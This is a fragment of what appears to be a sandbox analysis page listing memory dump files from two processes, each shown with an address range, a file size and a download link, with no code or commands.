memory/2556-334-0x0000000002F60000-0x0000000002F96000-memory.dmp

Filesize
216KB

Download
memory/2556-357-0x0000000008A80000-0x0000000009024000-memory.dmp

Filesize
5.6MB

Download
memory/2556-359-0x0000000074C60000-0x0000000075410000-memory.dmp

Filesize
7.7MB

Download
memory/2556-355-0x0000000007960000-0x00000000079F6000-memory.dmp

Filesize
600KB

Download
memory/2556-336-0x00000000054E0000-0x00000000054F0000-memory.dmp

Filesize
64KB

Download
memory/2556-335-0x0000000074C60000-0x0000000075410000-memory.dmp

Filesize
7.7MB

Download
memory/2556-356-0x00000000078C0000-0x00000000078E2000-memory.dmp

Filesize
136KB

Download
memory/2556-337-0x0000000005B20000-0x0000000006148000-memory.dmp

Filesize
6.2MB

Download
memory/2556-339-0x0000000005A20000-0x0000000005A86000-memory.dmp

Filesize
408KB

Download
memory/2556-340-0x0000000006150000-0x00000000061B6000-memory.dmp

Filesize
408KB

Download
memory/2556-338-0x0000000005980000-0x00000000059A2000-memory.dmp

Filesize
136KB

Download
memory/2556-350-0x0000000006200000-0x0000000006554000-memory.dmp

Filesize
3.3MB

Download
memory/2556-352-0x0000000006890000-0x00000000068DC000-memory.dmp

Filesize
304KB

Download
memory/2556-351-0x0000000006850000-0x000000000686E000-memory.dmp

Filesize
120KB

Download
memory/2556-354-0x0000000006DF0000-0x0000000006E0A000-memory.dmp

Filesize
104KB

Download
memory/2556-353-0x0000000007E50000-0x00000000084CA000-memory.dmp

Filesize
6.5MB

Download
memory/4300-330-0x00000242D3610000-0x00000242D3620000-memory.dmp

Filesize
64KB

Download
memory/4300-328-0x00007FF972AE0000-0x00007FF9735A1000-memory.dmp

Filesize
10.8MB

Download
memory/4300-333-0x00000242D3610000-0x00000242D3620000-memory.dmp

Filesize
64KB

Download
memory/4300-327-0x00000242EDDC0000-0x00000242EDDE2000-memory.dmp

Filesize
136KB

Download
memory/4300-329-0x00000242D3610000-0x00000242D3620000-memory.dmp

Filesize
64KB

Download
memory/4300-362-0x00007FF972AE0000-0x00007FF9735A1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing